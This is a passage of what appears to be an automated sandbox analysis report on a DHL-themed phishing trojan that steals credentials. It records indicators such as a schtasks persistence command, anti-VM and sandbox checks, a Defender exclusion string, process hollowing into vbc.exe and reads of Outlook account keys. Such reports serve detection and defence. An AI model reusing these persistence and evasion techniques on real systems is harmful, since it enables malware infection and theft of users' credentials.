            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp70BF.tmpJump to behavior
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@10/7@0/1
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00418073 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,11_2_00418073
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe, 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00417BE9 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,11_2_00417BE9
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00413424 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,11_2_00413424
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMutant created: \Sessions\1\BaseNamedObjects\vsnTDpNgPVtyiPSBVsGfKIlxfV
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMutant created: \Sessions\1\BaseNamedObjects\reblGreen Software DimWin Brightness
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMutant created: \Sessions\1\BaseNamedObjects\0afb590f-6441-4e30-9017-486274a19cc9
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_004141E0 FindResourceW,SizeofResource,LoadResource,LockResource,11_2_004141E0
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u206b????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: DHL_AWB 518877882999_887755468_pdf.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: DHL_AWB 518877882999_887755468_pdf.exeStatic file information: File size 1078272 > 1048576
            Source: DHL_AWB 518877882999_887755468_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: DHL_AWB 518877882999_887755468_pdf.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x106800
            Source: DHL_AWB 518877882999_887755468_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe
            Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.525571222.000000000330E000.00000004.00000001.sdmp, vbc.exe

            Data Obfuscation:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeUnpacked PE file: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.f40000.0.unpack
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeUnpacked PE file: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.f40000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_00F420E0 push ecx; ret 0_2_00F42101
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_00F421E2 push ecx; iretd 0_2_00F421FF
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_00F431C9 push esi; retf 0_2_00F431CA
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_00F4216E push 3D7EE852h; retf 0_2_00F4217B
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A727B push esi; retf 0_2_019A727C
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_00E621E2 push ecx; iretd 7_2_00E621FF
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_00E620E0 push ecx; ret 7_2_00E62101
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_00E631C9 push esi; retf 7_2_00E631CA
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_00E6216E push 3D7EE852h; retf 7_2_00E6217B
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_0169326C push ss; retf 7_2_0169326D
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016932F5 push ss; retf 7_2_016932F6
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_0169F4E0 push es; ret 7_2_0169F4F0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016997A9 push 00000069h; ret 7_2_016997AB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00444975 push ecx; ret 11_2_00444985
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00444B90 push eax; ret 11_2_00444BA4
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00444B90 push eax; ret 11_2_00444BCC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00448E74 push eax; ret 11_2_00448E81
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0042CF44 push ebx; retf 0042h11_2_0042CF49
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_00412341 push ecx; ret 24_2_00412351
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_00412360 push eax; ret 24_2_00412374
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_00412360 push eax; ret 24_2_0041239C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004443B0
            Source: initial sampleStatic PE information: section name: .text entropy: 7.77724876545
            Source: initial sampleStatic PE information: section name: .text entropy: 7.77724876545
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeFile created: C:\Users\user\AppData\Roaming\cmsyNzu.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00443A61 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00443A61
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.3466e5c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp, DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 4844Thread sleep time: -34041s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 4732Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 5016Thread sleep count: 136 > 30Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 5016Thread sleep time: -136000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 476Thread sleep count: 149 > 30Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 476Thread sleep time: -149000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040978A
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0041829C memset,GetSystemInfo,11_2_0041829C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,11_2_0040938F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,11_2_00408CAC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,24_2_0040702D
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeThread delayed: delay time: 34041Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040978A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004443B0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 20F008Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
